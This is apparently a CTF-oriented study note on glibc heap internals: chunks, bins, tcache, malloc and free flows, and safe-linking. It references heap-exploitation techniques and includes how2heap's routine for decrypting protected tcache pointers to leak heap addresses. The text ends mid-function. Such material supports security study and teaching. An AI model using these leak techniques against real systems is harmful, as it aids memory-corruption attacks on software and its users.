References

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/introduction/

https://www.cnblogs.com/ve1kcon/p/18071091

https://iyheart.github.io/2024/10/11/CTFblog/PWN%E7%B3%BB%E5%88%97blog/Linux_pwn/2.%E5%A0%86%E7%B3%BB%E5%88%97/PWN%E5%A0%86unlink/index.html

https://eastxuelian.nebuu.la/glibc/glibc-simple

https://www.roderickchan.cn/zh-cn/2023-02-27-house-of-all-about-glibc-heap-exploitation/#21-house-of-spirit

https://zikh26.github.io/posts/501cca6.html

https://zp9080.github.io/post/%E5%A0%86%E6%9D%82%E8%AE%B0/%E9%AB%98%E7%89%88%E6%9C%ACoff-by-null/

https://blog.csdn.net/qq_41683953/article/details/136767925

http://124.220.191.5/2025/09/13/off-by-null/index.html

https://9anux.org/2024/08/06/house%20of%20water%20&%20TFCCTF%202024%20MCGUAVA/

https://zephyr369.online/houseofwater/

https://bbs.kanxue.com/thread-268245.htm

https://enllus1on.github.io/2024/01/22/new-read-write-primitive-in-glibc-2-38/#more%EF%BC%8C%E6%94%B9%E8%BF%9B%E5%90%8E%E5%B0%B1%E4%B8%8D%E9%9C%80%E8%A6%81wide_data%E4%BA%86

https://zp9080.github.io/post/%E5%A0%86%E6%94%BB%E5%87%BBio_file/house-of-apple1/

https://196082.github.io/2022/08/05/house-of-apple2/

https://www.cnblogs.com/mazhatter/p/18475601

https://blog.csome.cc/p/house-of-some/

https://nicholas-wei.github.io/2022/02/07/tcache-stashing-unlink-attack/

https://xz.aliyun.com/spa/#/news/5139

https://blog.csdn.net/qq_45323960/article/details/123810198?ops_request_misc=&request_id=&biz_id=102&utm_term=io_file&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-123810198.142^v102^pc_search_result_base8&spm=1018.2226.3001.4187

https://bbs.kanxue.com/thread-272098.htm

https://bbs.kanxue.com/thread-275968.htm

https://www.cameudis.com/2024/04/18/BlackHatMEA2023-House-of-Minho.html

Heap structure and management

ptmalloc

brk

int brk(void *addr)

The argument is the new program break (the new top of the heap). Returns 0 on success and -1 on failure.

sbrk

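void *sbrk(intptr_t incr)

The argument is the number of bytes by which to grow the heap (it may be negative or zero). On success it returns the previous program break, so sbrk(0) returns the current top of the heap; on failure it returns (void *) -1.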

mmap

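void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset)

The parameters are:

  • addr: start address of the mapping; usually NULL, which lets the kernel choose the address.
  • length: length of the mapping.
  • prot: protection of the mapping; either PROT_NONE or a bitwise OR of PROT_EXEC, PROT_READ and PROT_WRITE.
  • flags: properties of the mapping, such as MAP_SHARED, MAP_PRIVATE and MAP_FIXED.
  • fd: file descriptor of the file to map, usually returned by open.
  • offset: offset into the file where the mapping starts, usually 0.

Returns a pointer to the mapped area on success and MAP_FAILED on failure.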

munmap

int munmap(void *addr, size_t length)

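addr is the address returned by mmap, and length is the size of the mapping.

Returns 0 on success and -1 on failure.

Heap memory obtained through mmap() and through brk()/sbrk() is independent: each mechanism manages its own memory region, and calling mmap does not move the brk pointer.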

chunk

struct malloc_chunk {    
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

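The fields of the chunk structure are explained below:

  • prev_size: if the physically adjacent previous chunk (the chunk at the lower address; the difference between the two chunk addresses equals the previous chunk's size) is free, this field records the size of that chunk, including its header. Otherwise the field may hold user data belonging to the previous chunk.
  • size: the size of this chunk, which must be a multiple of MALLOC_ALIGNMENT. A request that is not a multiple of MALLOC_ALIGNMENT is rounded up to the smallest multiple that can hold it; the request2size() macro does this. MALLOC_ALIGNMENT is normally 2 * SIZE_SZ: typically 8 on 32-bit systems (some configurations use 16) and 16 on 64-bit systems.
    • The low three bits of this field do not affect the chunk size. From high to low they are:
    • NON_MAIN_ARENA (A): whether the chunk belongs to an arena other than the main arena; 1 means it does not belong to the main arena, 0 means it does.
    • IS_MMAPPED (M): whether the chunk was allocated by mmap; M=1 means it comes from an mmap'd region, M=0 means it comes from the heap region.
    • PREV_INUSE (P): whether the previous chunk is allocated.
      • The P bit of the first chunk allocated in the heap is generally set to 1.
      • When the P bit of a chunk's size field is 0, the prev_size field gives the size, and therefore the address, of the previous chunk.
      • When P=1 the previous chunk is in use and prev_size is not valid.
  • fd, bk: while the chunk is allocated, user data starts at the fd field. When the chunk is free it is added to the matching free list, and the fields mean the following:
    • fd points to the next free chunk in the list (not necessarily physically adjacent).
    • bk points to the previous free chunk in the list (not necessarily physically adjacent).
    • Through fd and bk, free chunks are linked into a free list and managed together.
  • fd_nextsize, bk_nextsize: also used only while the chunk is free, and only for larger chunks (large chunks).
    • fd_nextsize points to the first free chunk in the fd direction whose size differs from this chunk (the next smaller size), not counting the bin head pointer.
    • bk_nextsize points to the first free chunk in the bk direction whose size differs from this chunk (the next larger size), not counting the bin head pointer.
    • Free large chunks are generally kept in descending size order along fd, which avoids walking every chunk when searching for a fit.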
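
// Get the pointer to the user data from a chunk pointer
#define chunk2mem(p) ((void*)((char*)(p) + 2 * sizeof(size_t)))

// Get the chunk pointer from a user data pointer (mchunkptr is already a pointer type)
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2 * sizeof(size_t)))

// Get the pointer to the physically next chunk (size with the three flag bits masked off)
#define next_chunk(p) ((mchunkptr)((char*)(p) + ((p)->size & ~0x7)))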

The first two fields are called the chunk header and the rest is called user data. The pointer returned by malloc points to the start of the user data.
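The size rounding and the three flag bits described above can be sketched in Python. This is a minimal sketch assuming a 64-bit target (SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 0x20); `request2size` mirrors the glibc macro of the same name, while `decode_size_field` is a hypothetical helper introduced only for illustration.

```python
SIZE_SZ = 8                          # assumption: 64-bit target
MALLOC_ALIGNMENT = 2 * SIZE_SZ       # 16 bytes
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1
MINSIZE = 4 * SIZE_SZ                # smallest chunk: prev_size, size, fd, bk

PREV_INUSE = 0x1      # P bit
IS_MMAPPED = 0x2      # M bit
NON_MAIN_ARENA = 0x4  # A bit


def request2size(req: int) -> int:
    """Round a user request up to the chunk size the allocator uses."""
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    if padded < MINSIZE:
        return MINSIZE
    return padded & ~MALLOC_ALIGN_MASK


def decode_size_field(raw: int) -> dict:
    """Split a raw size field into the chunk size and its A/M/P flags."""
    return {
        "size": raw & ~0x7,
        "A": bool(raw & NON_MAIN_ARENA),
        "M": bool(raw & IS_MMAPPED),
        "P": bool(raw & PREV_INUSE),
    }


if __name__ == "__main__":
    for req in (0, 0x18, 0x19, 0x100):
        print(hex(req), "->", hex(request2size(req)))
    print(decode_size_field(0x91))
```

A request of 0x18 bytes still fits in a 0x20 chunk because an allocated chunk may also use the prev_size field of the next chunk, which is why only SIZE_SZ (not 2 * SIZE_SZ) is added before rounding.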

top chunk

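  • On the first malloc, memory is requested from the system and placed in the top chunk. av->top then points to the prev_size field of the top chunk, and a chunk is split off from the top chunk.
  • On later mallocs, the bins are checked first for a suitable free chunk. If there is none, a chunk is split off from the top chunk and the top pointer of main_arena is updated.
  • If the requested size is larger than the top chunk, the free chunks in the bins are consolidated with the top chunk, and the merged top chunk is checked again.
  • If none of the above succeeds, more memory is requested through a system call and the top chunk is extended.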

bins

A bin is a linked list of struct malloc_chunk entries that manages free chunks.

#include <stddef.h>

// Simplified chunk layout (illustration only, not the glibc definition)
typedef struct malloc_chunk {
    size_t prev_size;          // size of the previous chunk
    size_t size;               // size of this chunk
    struct malloc_chunk *fd;   // forward pointer
    struct malloc_chunk *bk;   // backward pointer
} malloc_chunk;

typedef malloc_chunk *mchunkptr;
typedef malloc_chunk *mfastbinptr;

// Simplified allocator state
typedef struct malloc_state {
    mfastbinptr fastbinsY[10]; // fast bins, simplified to 10 sizes
    mchunkptr unsorted_bin;    // head of the unsorted bin list
    mchunkptr smallbins[64];   // small bins, simplified to 64 sizes
    mchunkptr largebins[64];   // large bins, simplified to 64 sizes
    // other bookkeeping fields
} malloc_state;

// Initialize a malloc_state: every bin starts empty
void init_malloc_state(malloc_state *state) {
    for (int i = 0; i < 10; ++i) {
        state->fastbinsY[i] = NULL;
    }
    state->unsorted_bin = NULL;
    for (int i = 0; i < 64; ++i) {
        state->smallbins[i] = NULL;
        state->largebins[i] = NULL;
    }
}

fastbin

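  • Size: 0x20 to 0x80 including the header (64-bit defaults)
  • Count: 10 lists
  • A chunk in a fastbin keeps its in-use status: the PREV_INUSE bit of the physically next chunk stays 1. This prevents fastbin chunks from being coalesced, so they can be handed out quickly.
  • Singly linked list connected through fd; insertion and removal both happen at the list head, LIFO (last in, first out)
  • On free, only the chunk at the head of the list is checked, so only freeing the same chunk twice in a row is reported as an error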
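The LIFO behaviour and the head-only double free check can be illustrated with a toy model. This is a sketch under stated assumptions, not the glibc implementation: `ToyFastbin` is a hypothetical class, chunks are represented by plain labels, and `fastbin_index` follows the 64-bit form of the glibc macro (shift by 4, minus 2).

```python
def fastbin_index(chunk_size: int, size_sz: int = 8) -> int:
    """Index of the fastbin that holds chunks of this size."""
    return (chunk_size >> (4 if size_sz == 8 else 3)) - 2


class ToyFastbin:
    """One singly linked fastbin list; chunks are modelled as labels."""

    def __init__(self):
        self.head = None
        self.fd = {}          # chunk label -> next chunk in the list

    def free(self, chunk):
        # Only the current head is compared against the chunk being freed.
        if self.head == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fd[chunk] = self.head
        self.head = chunk

    def malloc(self):
        victim = self.head
        if victim is not None:
            self.head = self.fd[victim]
        return victim


if __name__ == "__main__":
    fb = ToyFastbin()
    fb.free("a")
    fb.free("b")
    fb.free("a")              # not detected: "a" is no longer the head
    print([fb.malloc() for _ in range(3)])
```

Freeing a, b, a slips past the check and the same chunk is handed out twice, which is the classic fastbin double free pattern. On tcache-enabled versions the matching tcache bin has to be full before frees reach the fastbin at all.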

unsortedbin

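  • Size: unlimited
  • Count: 1 list
  • Freed memory larger than max_fast, and chunks produced by consolidating the fastbins, go into the unsortedbin first
  • Doubly linked list, FIFO (first in, first out)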

smallbin

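  • Size: below 0x400 (64-bit)
  • Count: 62
  • Doubly linked list, FIFO
  • When a small chunk is freed, its neighbouring chunks are checked first. If a neighbour is free, the two are merged into a new chunk and the neighbour is removed from its smallbin; the new chunk is then added to the unsortedbin, and it is moved to the matching bin later, when the unsortedbin is sorted
  • Conditions for a chunk to end up in a smallbin
    • Its size is within the smallbin range
    • A chunk is freed into the unsortedbin, and then a request is made that cannot be served from the unsortedbin or the smallbins; the chunk that was sitting in the unsortedbin is then moved into its smallbin
    • A chunk from a smallbin is split and the remainder goes into the unsortedbin first; if a later request does not split the chunk in the unsortedbin, that chunk is moved into its smallbin

| Index | Chunk size, 32-bit (bytes) | Chunk size, 64-bit (bytes) |
|-------|----------------------------|----------------------------|
| 2     | 16                         | 32                         |
| 3     | 24                         | 48                         |
| x     | 8x                         | 16x                        |
| 63    | 504                        | 1008                       |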
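The index table above follows directly from the spacing between bins, and can be reproduced with a few lines of Python. This is a minimal sketch: `smallbin_index` and `in_smallbin_range` mirror the glibc macros of the same name (assuming SMALLBIN_CORRECTION is 0), and `smallbin_chunk_size` is a hypothetical inverse helper.

```python
NSMALLBINS = 64


def smallbin_index(chunk_size: int, size_sz: int = 8) -> int:
    """Small bins are spaced 2 * SIZE_SZ bytes apart: 16 on 64-bit, 8 on 32-bit."""
    return chunk_size >> 4 if size_sz == 8 else chunk_size >> 3


def smallbin_chunk_size(index: int, size_sz: int = 8) -> int:
    """Chunk size held by the small bin with this index."""
    return index * 2 * size_sz


def in_smallbin_range(chunk_size: int, size_sz: int = 8) -> bool:
    """True while the size is below MIN_LARGE_SIZE (0x400 on 64-bit)."""
    return chunk_size < NSMALLBINS * 2 * size_sz


if __name__ == "__main__":
    for idx in (2, 3, 63):
        print(idx, smallbin_chunk_size(idx, 4), smallbin_chunk_size(idx, 8))
```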

largebin

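  • Size: 0x400 and above (64-bit)
  • Count: 63
  • Chunks are additionally linked through fd_nextsize and bk_nextsize
  • Chunks in the same largebin may have different sizes
  • A large chunk can be inserted into or removed from any position in a large bin
  • All chunks in one largebin are sorted from largest to smallest: the largest chunk sits at the head of the list and the smallest at the tail; chunks of the same size are ordered by how recently they were used
  • The size of the chunk at the head of the list is checked first. If it is large enough, the large bin is walked from the tail to find the first chunk whose size equals the request or is the closest above it. If that chunk is larger than the request, it is split in two: the first part has exactly the requested size and is handed out, and the rest becomes a new chunk that is added to the unsorted bin
  • If the largest chunk in the large bin is smaller than the request, binmap is used to find the next non-empty large bin, and the chunk is allocated from it as described above. If no such bin exists, the top chunk is used
  • free behaves like it does for smallbins

| Group | Number of bins | Spacing between bins (bytes) |
|-------|----------------|------------------------------|
| 1     | 32             | 64                           |
| 2     | 16             | 512                          |
| 3     | 8              | 4096                         |
| 4     | 4              | 32768                        |
| 5     | 2              | 262144                       |
| 6     | 1              | unlimited                    |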
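The group spacings in the table correspond to the shifts used when a size is mapped to a large bin index. The sketch below transcribes the 64-bit form of the glibc `largebin_index_64` macro as I understand it; treat the constants as an assumption to be checked against the malloc.c of the glibc version under study.

```python
def largebin_index_64(chunk_size: int) -> int:
    """Map a chunk size to its large bin index on a 64-bit target."""
    if (chunk_size >> 6) <= 48:      # group 1: 64-byte spacing
        return 48 + (chunk_size >> 6)
    if (chunk_size >> 9) <= 20:      # group 2: 512-byte spacing
        return 91 + (chunk_size >> 9)
    if (chunk_size >> 12) <= 10:     # group 3: 4096-byte spacing
        return 110 + (chunk_size >> 12)
    if (chunk_size >> 15) <= 4:      # group 4: 32768-byte spacing
        return 119 + (chunk_size >> 15)
    if (chunk_size >> 18) <= 2:      # group 5: 262144-byte spacing
        return 124 + (chunk_size >> 18)
    return 126                       # group 6: everything larger


if __name__ == "__main__":
    for size in (0x400, 0x430, 0x440, 0xc40, 0x100000):
        print(hex(size), "->", largebin_index_64(size))
```

Sizes 0x400 and 0x430 share index 64, which shows why chunks in the same large bin may differ in size and why the nextsize list is needed.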

tcache

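  • Similar to fastbin: LIFO, insertion at the head

  • On the first malloc, a block of memory is allocated to hold the tcache_perthread_struct.

  • When freeing memory whose size is below the small bin size limit:

    • Before tcache existed, the chunk went into a fastbin or the unsorted bin
    • With tcache:
      • The chunk goes into the matching tcache bin until that bin is full (7 entries by default)
      • Once the bin is full, chunks go into a fastbin or the unsorted bin
      • Chunks in the tcache are not coalesced (their inuse bit is not cleared)
  • When allocating memory whose size is within the tcache range:

    • Chunks are taken from the tcache first, until it is empty, and only then from the bins
    • When the tcache is empty and a fastbin, smallbin or the unsorted bin holds chunks of the right size, those chunks are first moved into the tcache until it is full, and the request is then served from the tcache. As a result, the order of the chunks in the tcache is the reverse of their order in the bin

  • A tcache entry points directly at the user data address, unlike the other bins, which point at the chunk header

  • For the tcache, glibc creates a tcache_perthread_struct the first time a chunk is requested; this structure is also stored on the heap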

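    /* Every thread has one of these structures, which is why it is called "perthread". Keeping the overall size small matters. */
    // TCACHE_MAX_BINS defaults to 64

    // In glibc 2.26 to 2.29 each count is 1 byte, so tcache_perthread_struct takes 1*64 + 8*64 = 0x240 bytes, i.e. a 0x250 chunk including the header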
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    } tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

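    // Since glibc 2.29 a key field is added. Up to 2.33 it holds the address of tcache_perthread_struct; from 2.34 on it holds a random value (check it with p/x tcache_key). The key is written when a chunk is put into the tcache and cleared when the chunk is taken out.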
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

    // From glibc 2.30 on each count is 2 bytes, so tcache_perthread_struct takes 2*64 + 8*64 = 0x280 bytes, i.e. a 0x290 chunk including the header

    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

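    // glibc 2.32 introduced PROTECT_PTR (safe-linking): the next pointer is stored XOR-encoded, so a leaked pointer cannot be decoded correctly without some knowledge of the heap address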

    static __always_inline void
    tcache_put (mchunkptr chunk, size_t tc_idx)
    {
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

    /* Mark this chunk as "in the tcache" so the test in _int_free will
    detect a double free. */
    e->key = tcache_key;

    e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
    }

    /* Caller must ensure that we know tc_idx is valid and there's
    available chunks to remove. Removes chunk from the middle of the
    list. */
    static __always_inline void *
    tcache_get_n (size_t tc_idx, tcache_entry **ep)
    {
    tcache_entry *e;
    if (ep == &(tcache->entries[tc_idx]))
    e = *ep;
    else
    e = REVEAL_PTR (*ep);

    if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");

    if (ep == &(tcache->entries[tc_idx]))
    *ep = REVEAL_PTR (e->next);
    else
    *ep = PROTECT_PTR (ep, REVEAL_PTR (e->next));

    --(tcache->counts[tc_idx]);
    e->key = 0;
    return (void *) e;
    }
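The two structure sizes quoted in the comments above, and the mapping from chunk size to tcache bin, can be checked with a short calculation. This is a sketch assuming a 64-bit target; `csize2tidx` mirrors the glibc macro of the same name, while `tidx2csize` and `tcache_struct_chunk_size` are hypothetical helpers.

```python
SIZE_SZ = 8                 # assumption: 64-bit target
MALLOC_ALIGNMENT = 16
MINSIZE = 0x20
TCACHE_MAX_BINS = 64


def csize2tidx(chunk_size: int) -> int:
    """tcache bin index for a chunk size (header included)."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def tidx2csize(idx: int) -> int:
    """Chunk size served by tcache bin idx."""
    return MINSIZE + idx * MALLOC_ALIGNMENT


def tcache_struct_chunk_size(count_bytes: int) -> int:
    """Chunk size of tcache_perthread_struct for a given counts element width."""
    payload = count_bytes * TCACHE_MAX_BINS + SIZE_SZ * TCACHE_MAX_BINS
    return payload + 2 * SIZE_SZ      # add the chunk header


if __name__ == "__main__":
    print(hex(tcache_struct_chunk_size(1)))   # char counts (2.26 to 2.29)
    print(hex(tcache_struct_chunk_size(2)))   # uint16_t counts (2.30 and later)
    print(hex(tidx2csize(TCACHE_MAX_BINS - 1)))
```

With 64 bins the largest chunk size handled by the tcache is 0x410, which is why chunks of 0x420 and above are a common choice when a free should bypass the tcache.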

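When the first entry is put into an empty tcache bin, its next (fd) pointer is NULL, so the stored value is 0 XOR (address >> 12), which is simply the entry's own address shifted right by 12 bits. In other words, nothing is actually hidden: leaking this field gives the heap address (without its low 12 bits) directly.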

#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
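The two macros can be mirrored in Python to see what ends up in memory. This is a minimal sketch: `protect_ptr` and `reveal_ptr` are hypothetical Python names for PROTECT_PTR and REVEAL_PTR, and the addresses are made-up example values.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """pos is the address where the pointer is stored, ptr the real target."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, stored: int) -> int:
    """XOR is its own inverse, so decoding reuses the same operation."""
    return protect_ptr(pos, stored)


if __name__ == "__main__":
    # First chunk freed into an empty bin: next is NULL.
    first = 0x5555555592a0
    leak = protect_ptr(first, 0)
    print(hex(leak), "-> heap page", hex(leak << 12))

    # Second chunk freed into the same bin: next points to the first chunk.
    second = 0x5555555592c0
    stored = protect_ptr(second, first)
    print(hex(stored), "->", hex(reveal_ptr(second, stored)))
```

When the storage address is known, decoding is a single XOR. The iterative decrypt routine is only needed when the storage address is unknown and the stored value must be unwound 12 bits at a time, which works when the pointer and its storage location share the same upper bits.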

how2heap shows how to decrypt the fd pointer of the second chunk freed into the tcache:

long decrypt(long cipher)
{
    puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
    puts("because of the 12bit sliding.");
    puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
    long key = 0;
    long plain;
    for(int i=1; i<6; i++) {
        int bits = 64-12*i;
        if(bits < 0) bits = 0;
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12;
        printf("round %d:\n", i);
        printf("key:    %#016lx\n", key);
        printf("plain:  %#016lx\n", plain);
        printf("cipher: %#016lx\n\n", cipher);
    }
    return plain;
}

The same routine in Python:

def decrypt(cipher):
    key = 0
    plain = 0
    for i in range(1, 6):
        bits = 64 - 12 * i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits
        key = plain >> 12
        #print(f"round {i}:")
        #print(f"key:    0x{key:016x}")
        #print(f"plain:  0x{plain:016x}")
        #print(f"cipher: 0x{cipher:016x}\n")
    return plain

if __name__ == "__main__":
    b = 0x55500000c7f9
    plaintext = decrypt(b)
    print(f"recovered value: 0x{plaintext:016x}")
   
#recovered value: 0x00005555555592a0

Heap initialization and management flow

malloc

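  • First call to malloc: execution follows the hook pointer into malloc_hook_ini(), which initializes ptmalloc. It clears the hook, then calls ptmalloc_init() and __libc_malloc()

  • Later calls to malloc: malloc() -> __libc_malloc() -> _int_malloc()

  • checked_request2size converts the requested size into the actual chunk size

  • First try to allocate from the fastbins (chunk size up to 0x80)

  • Then try to allocate from the smallbins (chunk size below 0x400)

    • If the smallbins are not initialized yet, run malloc_consolidate
      • If the fastbins of the malloc_state are empty, initialize the whole malloc_state
      • malloc_init_state(av) first initializes every bin other than the fastbins, then initializes the fastbins
  • Run malloc_consolidate, which moves the chunks in the fastbins to the unsortedbin

    • If ptmalloc is not initialized, initialize it
    • If the prev_inuse bit of the current chunk is 0, consolidate backward
    • If the adjacent chunk at the higher address is free, consolidate forward
    • If the chunk after the current chunk is not the top chunk, put the chunk into the unsortedbin
      • If it is of largebin size, set fd_nextsize and bk_nextsize to NULL
    • If the chunk after the current chunk is the top chunk, merge the current chunk into the top chunk
    • Repeat until every fastbin list has been walked
  • Walk the chunks in the unsortedbin

    • If the unsortedbin holds exactly one chunk, that chunk is the last remainder of the previous allocation, the requested size is in the smallbin range, and the chunk is at least as large as the request, the chunk is split directly and the rest stays in the unsortedbin
    • Otherwise the chunks are sorted from the back of the list to the front: each one is moved into the smallbin or largebin that matches its size, until a chunk with chunk_size = nb is found or the list is empty
      • When the unsortedbin holds several chunks, the chunk is not split directly inside the unsortedbin
      • When it holds exactly one, the chunk is split directly
  • Walk the smallbins and largebins following the smallest-first, best-fit rule: find a suitable chunk, split off a chunk of the requested size, and link the rest into the unsortedbin

  • Try to allocate the chunk from the top chunk

  • If the allocation still has not succeeded, fall back to sbrk or mmap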
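The order in which the steps above are tried can be summarized as a small function. This is a simplified sketch, not the glibc control flow: `lookup_order` is a hypothetical helper, the thresholds assume 64-bit defaults (tcache up to 0x410, fastbins up to 0x80, small bins below 0x400), and the state of the bins is ignored.

```python
SIZE_SZ = 8                  # assumption: 64-bit target
MALLOC_ALIGN_MASK = 0xF
MINSIZE = 0x20
MAX_FAST = 0x80              # default fastbin limit
MIN_LARGE_SIZE = 0x400       # first large bin size
TCACHE_MAX_CHUNK = 0x410     # largest chunk size kept in the tcache


def request2size(req: int) -> int:
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    return MINSIZE if padded < MINSIZE else padded & ~MALLOC_ALIGN_MASK


def lookup_order(request: int, tcache: bool = True) -> list:
    """List the places consulted for a request, in order."""
    nb = request2size(request)
    order = []
    if tcache and nb <= TCACHE_MAX_CHUNK:
        order.append("tcache")
    if nb <= MAX_FAST:
        order.append("fastbin")
    if nb < MIN_LARGE_SIZE:
        order.append("smallbin")
    else:
        order.append("malloc_consolidate (if fastbins hold chunks)")
    order.append("unsorted bin")
    if nb >= MIN_LARGE_SIZE:
        order.append("largebin of matching index")
    order += ["larger bins via binmap", "top chunk", "sbrk/mmap"]
    return order


if __name__ == "__main__":
    for req in (0x18, 0x100, 0x500):
        print(hex(req), lookup_order(req))
```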

free

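  • Check whether free_hook is set; if so, call the function it points to and return
  • Check whether the address passed to free is 0; if so, return immediately
  • Convert addr into a pointer to its chunk
  • Check whether the chunk was allocated by mmap; if so, handle it separately by calling munmap_chunk()
  • Get the chunk's arena and call _int_free with the arena pointer, the chunk address and 0 (the lock flag)
  • Check whether the chunk can be linked into a fastbin
  • Run a series of checks
    • Acquire the arena lock first
    • The chunk being freed must not be the top chunk
    • If the chunk being freed was allocated through sbrk(), the address of the next adjacent chunk must not lie beyond the top chunk
    • The flag bits in the size of the next adjacent chunk must mark the chunk being freed as in use
    • The size of the next adjacent chunk must be greater than 2*SIZE_SZ and less than the total memory allocated to the arena
  • Decide whether to link the chunk into a fastbin or merge it with the top chunk
  • Overwrite the chunk with junk data (perturb), link the chunk into the fastbin, run the double free check, and so on
  • Check whether the previous chunk is free; if so, merge with it
  • Check whether the next chunk is the top chunk and whether it is free; if it is free, merge with it
  • If the merged chunk borders the top chunk, merge it into the top chunk; otherwise put it into the unsortedbin and run the checks
  • Run malloc_consolidate
  • Final steps
    • If the merged chunk is at least 0x10000 bytes and the fastbins hold free chunks, call malloc_consolidate
    • If the top chunk is larger than the heap trim threshold, shrink the heap
    • If the arena lock was acquired, release it
  • Large blocks are handled separately
  • Usage scenarios:
    • malloc
      • large bin
      • walking the unsortedbin
      • taking a chunk from a bin larger than the one matching the request
    • free
      • backward consolidation (merging with the physically adjacent free chunk at the lower address)
      • forward consolidation (except with the top chunk)
    • malloc_consolidate
      • free
    • realloc
      • forward expansion (except into the top chunk)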
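Backward and forward consolidation during free can be illustrated with a toy heap. This is a sketch under stated assumptions: the heap is a Python list of chunks in ascending address order, the last entry is the top chunk, `free_chunk` is a hypothetical helper, and the chunks are assumed to be too large for the tcache and fastbins (0x420 here), so the coalescing path is always taken.

```python
def free_chunk(heap: list, index: int) -> str:
    """Free heap[index], merging with free neighbours; return where it ends up."""
    chunk = heap[index]
    chunk["free"] = True

    # Backward consolidation: merge with the free chunk at the lower address.
    if index > 0 and heap[index - 1]["free"]:
        prev = heap[index - 1]
        prev["size"] += chunk["size"]
        del heap[index]
        index -= 1
        chunk = prev

    # Forward consolidation: merge with the top chunk or a free next chunk.
    nxt = heap[index + 1]
    if nxt.get("top"):
        nxt["size"] += chunk["size"]
        del heap[index]
        return "merged into top chunk"
    if nxt["free"]:
        chunk["size"] += nxt["size"]
        del heap[index + 1]
    return "unsorted bin"


def make_heap() -> list:
    sizes_free = [(0x420, False), (0x420, True), (0x420, False),
                  (0x420, True), (0x420, False)]
    heap = [{"size": s, "free": f} for s, f in sizes_free]
    heap.append({"size": 0x20000, "free": False, "top": True})
    return heap


if __name__ == "__main__":
    heap = make_heap()
    print(free_chunk(heap, 2), [hex(c["size"]) for c in heap])
    print(free_chunk(heap, 2), [hex(c["size"]) for c in heap])
```

The first free merges three chunks into one 0xc60 chunk that goes to the unsorted bin; the second free merges that chunk and its neighbour into the top chunk.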

malloc_consolidate

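  • Trigger points:
    • _int_malloc: a chunk of smallbin or largebin size is being allocated, or no suitable bin could satisfy the request and the top chunk is too small for it
    • _int_free: the chunk is at least FASTBIN_CONSOLIDATION_THRESHOLD (65536) bytes
    • malloc_trim: always called
    • int_mallinfo
    • mallopt: always called
  • _int_malloc (large size)
    • A chunk in the fastbin borders the top chunk
    • A chunk in the fastbin does not border the top chunk
    • Physically adjacent chunks in the fastbins are merged (they may have different sizes)

malloc_state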

The malloc_state of the main arena is not part of the heap segment. It is a global variable stored in the data segment of libc.so.

struct malloc_state { 
/* Serialize access. */
__libc_lock_define(, mutex);
/* Flags (formerly in max_fast). */
int flags; /* Fastbins */
mfastbinptr fastbinsY[ NFASTBINS ];
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[ NBINS * 2 - 2 ];
/* Bitmap of bins, help to speed up the process of determinating if a given bin is definitely empty.*/
unsigned int binmap[ BINMAPSIZE ];
/* Linked list, points to the next arena */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
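Field offsets inside malloc_state matter in practice, because a leaked unsorted bin fd or bk points at a fixed offset from main_arena. The sketch below rebuilds the layout with ctypes and computes that offset. Everything here is an assumption to verify against the target libc: a 64-bit build, a 4-byte mutex, NFASTBINS = 10, NBINS = 128, and an extra `have_fastchunks` int after `flags` in newer glibc versions. `malloc_state_layout` and `bin_at_offset` are hypothetical helpers.

```python
import ctypes

NFASTBINS = 10    # assumption: 64-bit default
NBINS = 128
BINMAPSIZE = 4
PTR = ctypes.c_uint64   # model pointers as 8-byte integers


def malloc_state_layout(with_have_fastchunks: bool):
    """Build a ctypes structure for the leading fields of malloc_state."""
    fields = [("mutex", ctypes.c_int32), ("flags", ctypes.c_int32)]
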